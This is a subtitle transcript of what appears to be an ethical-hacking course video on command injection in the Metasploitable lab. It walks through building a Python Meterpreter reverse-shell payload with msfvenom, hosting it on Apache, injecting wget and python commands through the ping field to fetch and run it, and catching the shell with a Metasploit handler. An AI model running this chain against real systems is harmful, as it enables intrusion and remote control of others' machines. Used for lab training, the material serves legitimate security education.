1
00:00:00,270 --> 00:00:07,800
OK, so we've covered command injection, but you can combine this vulnerability with other tools as

2
00:00:07,800 --> 00:00:08,060
well.

3
00:00:08,490 --> 00:00:15,060
For example, in the last video we managed to establish a connection using netcat and the command injection

4
00:00:15,060 --> 00:00:15,720
vulnerability.

5
00:00:16,140 --> 00:00:22,380
But we can improve this by injecting a different payload, such as a Meterpreter shell or a reverse

6
00:00:22,380 --> 00:00:24,170
shell that we coded in Python.

7
00:00:24,960 --> 00:00:27,140
The process of doing that is the same.

8
00:00:27,150 --> 00:00:33,330
So I will show you how to send a Meterpreter payload to the target and make it execute with command

9
00:00:33,330 --> 00:00:33,850
injection.

10
00:00:34,710 --> 00:00:36,010
Why would we want to do this?

11
00:00:36,420 --> 00:00:39,870
Well, we always want to have the best payload possible.

12
00:00:40,200 --> 00:00:46,800
So why would we use netcat when Meterpreter gives us a lot more useful options to run on the target system?

13
00:00:47,620 --> 00:00:54,370
And to do all of that, here are the steps that we must perform: we must first create the payload appropriate

14
00:00:54,370 --> 00:01:01,480
for our target, then we must download that payload to our target machine with the help of the command injection

15
00:01:01,480 --> 00:01:02,110
vulnerability.

16
00:01:02,290 --> 00:01:08,850
And at last, we must execute that payload, also with the help of the command injection vulnerability.

17
00:01:09,520 --> 00:01:11,360
So sounds pretty simple, right?

18
00:01:12,010 --> 00:01:14,920
Let's figure out what payload we should create first.

19
00:01:15,400 --> 00:01:19,600
So to create a payload, we need to figure out what we know about our target.

20
00:01:20,170 --> 00:01:27,340
Well, we know that Metasploitable is a Linux 32-bit machine, so we can create a Linux Meterpreter

21
00:01:27,340 --> 00:01:27,760
payload.

22
00:01:28,240 --> 00:01:31,700
But for this case, I like the Python payload a lot better.

23
00:01:32,170 --> 00:01:34,360
So let's create a Python Meterpreter

24
00:01:34,360 --> 00:01:35,260
shell.

25
00:01:36,270 --> 00:01:42,530
The great thing about Linux systems is that they come with Python by default, so a Python payload is something that

26
00:01:42,530 --> 00:01:47,290
we can execute on our target without them having to install any additional software.

27
00:01:48,050 --> 00:01:52,390
Let's create it real quick, so we'll navigate to my Desktop directory.

28
00:01:52,400 --> 00:02:00,320
And here I will type msfvenom -p and we'll specify that we want to create python/meterpreter

29
00:02:00,800 --> 00:02:03,200
/reverse_tcp.

30
00:02:04,240 --> 00:02:10,060
The LHOST is going to be our IP address, so let's check it out real quick.

31
00:02:12,400 --> 00:02:20,980
It is 192.168.1.9; copy and paste it right here. For the LPORT, we can use

32
00:02:20,980 --> 00:02:29,860
port 6000, for example, and we are going to output this with -o to tester.py.

33
00:02:30,160 --> 00:02:33,370
And I just named the payload tester, but feel free to name it

34
00:02:33,370 --> 00:02:34,800
anything that you want.

35
00:02:35,320 --> 00:02:39,130
I will press enter here and this will create our Python payload.

36
00:02:40,010 --> 00:02:46,280
Let me go right here over this, and while this is creating, make sure that your Burp Suite is started

37
00:02:46,280 --> 00:02:54,440
up, also make sure that your intercept is turned off, and start up your Firefox and your Metasploitable

38
00:02:54,560 --> 00:02:55,370
virtual machine.

39
00:02:56,130 --> 00:03:01,850
OK, so once you do that, here in just a few seconds our payload should be done.

40
00:03:02,870 --> 00:03:08,930
And here it is. Now that we got a payload created, we must figure out how we can deliver it to the target

41
00:03:08,930 --> 00:03:09,360
system.

42
00:03:09,950 --> 00:03:16,130
Of course we will do that using the command injection, but even then, the target must be able to download

43
00:03:16,130 --> 00:03:17,960
our payload from somewhere.

44
00:03:17,960 --> 00:03:18,380
Right?

45
00:03:18,800 --> 00:03:23,720
For this, we're going to use the Apache web server and host our payload

46
00:03:23,720 --> 00:03:29,120
there. Apache comes with Kali Linux already, so we can make it run real quick.

47
00:03:29,450 --> 00:03:35,630
To do that, we must first type sudo and then service apache2 start.

48
00:03:36,200 --> 00:03:37,970
It will ask us for the password.

49
00:03:37,970 --> 00:03:42,060
We input the password and this will start our Apache2 web server.

50
00:03:42,620 --> 00:03:43,460
What does this mean?

51
00:03:43,640 --> 00:03:52,340
Well, this means that any file that is hosted inside of the html directory in our Kali Linux will be hosted

52
00:03:52,340 --> 00:03:55,500
on our web page to anyone that visits our IP address.

53
00:03:56,210 --> 00:04:04,730
Let's first of all visit that directory: cd /var/www/html, type it here.

54
00:04:04,910 --> 00:04:12,470
And we got the text from some previous video, which we can delete straight away, and this might require

55
00:04:12,890 --> 00:04:13,750
root privileges.

56
00:04:13,850 --> 00:04:20,540
So let us just switch to the root account with sudo su and let's delete this shell data.

57
00:04:21,140 --> 00:04:26,180
And now our directory is empty, so no files are being hosted on our web server.

58
00:04:26,690 --> 00:04:32,960
Let's copy our tester.py, which in my case is in my home directory, /home/mrhacker/Desktop/tester.py,

59
00:04:32,960 --> 00:04:38,090
and we want to copy it inside of /var/www/html.

60
00:04:39,780 --> 00:04:46,410
And now, if we were to go to our Kali Linux machine and visit the IP address of my Kali Linux, which is

61
00:04:46,420 --> 00:04:53,730
192.168.1.9, we are going to see this page that has this file available to download.

62
00:04:54,560 --> 00:04:54,990
Great.

63
00:04:55,440 --> 00:04:59,590
All we are left to do right now is to execute this file on the target system.

64
00:05:00,360 --> 00:05:04,200
Let's go to our command injection page on our Metasploitable.

65
00:05:05,370 --> 00:05:08,850
And to do that, we visit the IP address of Metasploitable and navigate.

66
00:05:08,850 --> 00:05:16,860
All of this we already know: let us enter the username and password and go to the command injection.

67
00:05:16,860 --> 00:05:21,600
But before we do that, change the security level to either low or medium.

68
00:05:22,920 --> 00:05:28,970
Once we do that, inside of the command injection we can execute the commands as in the previous video.

69
00:05:29,400 --> 00:05:35,880
So if I type right here 127.0.0.1, and then a semicolon, and then

70
00:05:35,910 --> 00:05:43,310
ls after it, it will ping the IP address and it will also print out the contents of that directory.

71
00:05:43,560 --> 00:05:48,420
But we don't want to ping every time; we can just type a semicolon, which will specify that we want

72
00:05:48,420 --> 00:05:51,740
to enter the next command, and we can just type ls after it.

73
00:05:51,750 --> 00:05:57,660
And this will just give us the output of the command, and we will have to wait for the command to finish.

74
00:05:58,500 --> 00:06:05,160
Now let's download our payload using the wget command. wget is something that you can run from a terminal

75
00:06:05,160 --> 00:06:09,930
in order to download a specific file from the page or link that you specify.

76
00:06:10,560 --> 00:06:12,990
Let me show you inside of the terminal first.

77
00:06:13,320 --> 00:06:20,700
So right now I'm inside of the /home/mrhacker directory and I don't have the tester.py

78
00:06:20,700 --> 00:06:27,180
right here, but if I run the command wget 192.168.1.9, which is the IP

79
00:06:27,180 --> 00:06:32,070
address of Kali Linux, and then /tester.py, with this link

80
00:06:32,070 --> 00:06:39,510
we are accessing this page right here and this file right here, which will tell our terminal that we

81
00:06:39,510 --> 00:06:41,340
want to download that file.

82
00:06:41,370 --> 00:06:46,560
If I press enter, it will download tester.py, and if I type ls once again,

83
00:06:46,980 --> 00:06:51,480
now we have tester.py inside of our /home/mrhacker directory.

84
00:06:52,340 --> 00:06:59,600
We want to do the same thing on our target machine, so to do that, we can use the semicolon to specify

85
00:06:59,600 --> 00:07:08,660
the next command and type the same command: wget 192.168.1.9/tester.py.

86
00:07:09,590 --> 00:07:10,790
I press submit.

87
00:07:11,600 --> 00:07:18,650
And if I run the ls command once again, now we have one additional file, which is our payload.

88
00:07:19,770 --> 00:07:24,810
So there it is, it is on the target machine right now with the help of command injection.

89
00:07:25,760 --> 00:07:30,450
The last step we have to do is to set up a listener inside the msfconsole.

90
00:07:30,830 --> 00:07:35,540
Let's do that real quick, and after I set up a listener,

91
00:07:35,720 --> 00:07:37,460
we must execute our payload.

92
00:07:38,470 --> 00:07:42,730
And here is the msfconsole; we are already familiar with setting up the listener.

93
00:07:42,760 --> 00:07:50,890
We are going to use exploit/multi/handler and we need to set the payload to be python/meterpreter

94
00:07:52,900 --> 00:07:55,950
/reverse_tcp.

95
00:07:56,740 --> 00:08:02,830
If I show options, all we want to do is set the LHOST and LPORT, and that will be the IP address of

96
00:08:02,830 --> 00:08:06,640
Kali Linux, and the LPORT will be 6000.

97
00:08:06,790 --> 00:08:10,180
The same options that you specified inside of msfvenom.

98
00:08:11,380 --> 00:08:17,320
Then I will run this, and all we are left to do right now is to execute this tester.py with the

99
00:08:17,320 --> 00:08:18,600
help of command injection.

100
00:08:18,610 --> 00:08:19,930
So let's see how we can do that.

101
00:08:20,590 --> 00:08:27,400
If I type a semicolon and python tester.py and press enter,

102
00:08:28,460 --> 00:08:34,280
this page will load, and this is good news, because that would most likely mean that we got the Meterpreter

103
00:08:34,280 --> 00:08:36,920
shell opened with the help of Python.

104
00:08:37,160 --> 00:08:44,270
We executed our Python program on the target machine and it opened our Meterpreter shell, where we can execute

105
00:08:44,510 --> 00:08:45,400
various commands.

106
00:08:45,410 --> 00:08:52,040
As usual, we can run the help command to see what else we can execute, and we can basically perform the post

107
00:08:52,040 --> 00:08:54,100
exploitation that we already covered.

108
00:08:54,740 --> 00:08:55,150
Great.

109
00:08:55,370 --> 00:09:00,920
So this is just another way that you can use command injection to your advantage to spawn a better payload

110
00:09:00,920 --> 00:09:03,950
than just the simple netcat command execution.

111
00:09:04,490 --> 00:09:08,060
So you can try to test this with our Python payload if you want.

112
00:09:08,960 --> 00:09:14,240
Great, now that we covered the command injection vulnerability, in the next video we are going to go

113
00:09:14,240 --> 00:09:16,890
into the cross-site scripting vulnerability.

114
00:09:17,480 --> 00:09:18,020
See you there.